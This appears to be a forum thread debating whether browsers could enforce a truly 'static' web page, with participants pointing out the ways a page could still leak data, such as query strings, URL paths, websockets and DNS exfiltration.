[secureleaf]

This a great idea but it would be difficult to implement. Sure, it would be easy to catch (and block) HTTP requests other than OPTIONS and GET.

But even a GET request can be used to send data. Just pack the data you want to send in the query string and voila.

[pkulak]

Just some JS call like "startStatic()". At that point, all network activity is shut down for good, and the page gets a badge.

[outericky]

So don’t allow GET with query params. You want the static moniker? It has to be static. No server interaction after load, and no sending any data during load.

[city41]

You can still hide the data in "folders". /foo/bar/baz/buz can be totally dynamic on the server.

[ericfrederich]

How about after load, that tab automatically goes completely offline. Users can manually do this in Chrome on a tab by tab basis by using developer console and setting Throttling to "Offline"

[city41]

That sounds more promising. The site might be able to store data and then send it the next time the page is loaded. I think at the end of the day, a malicious dev could probably find a workaround to most implementations. Might just be better to vet out sites and use reputation to state they are truly offline.

[ericfrederich]

I hear what you're saying, but I also believe this to be a solvable problem

[richthegeek]

Note that the "offline" mode in devtools doesn't kill any websocket connections. It may have other holes i'm not aware of also.

[codethief]

Or in the subdomain, using "DNS exfiltration": https://twitter.com/rsobers/status/1293539543115862016

[city41]

That's an interesting exploit, thanks for sharing.